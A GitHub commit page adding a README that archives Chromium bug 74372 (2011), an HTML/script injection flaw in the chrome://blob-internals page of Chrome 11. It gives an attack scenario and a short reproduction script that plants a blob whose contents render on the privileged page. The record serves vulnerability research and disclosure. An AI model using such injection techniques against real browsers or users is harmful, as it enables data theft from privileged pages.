Skip to content

Commit 7a5dab2

Browse files
committed
feat(chrome): add cr-74372
1 parent 3b478fb commit 7a5dab2

File tree

1 file changed

+28
-0
lines changed

1 file changed

+28
-0
lines changed

chrome/cr-74372/README.md

+28
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,28 @@
1+
# chrome://blob-internals/ xss
2+
3+
#### Feb 28 2011
4+
5+
### VULNERABILITY DETAILS
6+
7+
> Attack scenario:
8+
>
9+
> 1. Person visits an evil site. it runs this code which install a url in the form of javascript - like `<script>` which can steal data from chrome:// url
10+
> 2. Asks user to visit chrome://blob-internals or asks to install extension that navigates to chrome://blob-internals.
11+
12+
#### VERSION
13+
14+
Chrome: 11.0.672.2 (Windows XP SP3)
15+
16+
#### REPRODUCTION CASE
17+
18+
```html
19+
<script>
20+
var builder = new BlobBuilder();
21+
var blob = builder.getBlob("<input>");
22+
var url = window.webkitURL.createObjectURL(blob);
23+
</script>
24+
```
25+
26+
then goto chrome://blob-internals/
27+
28+
Link: https://bugs.chromium.org/p/chromium/issues/detail?id=74372

0 commit comments

Comments
 (0)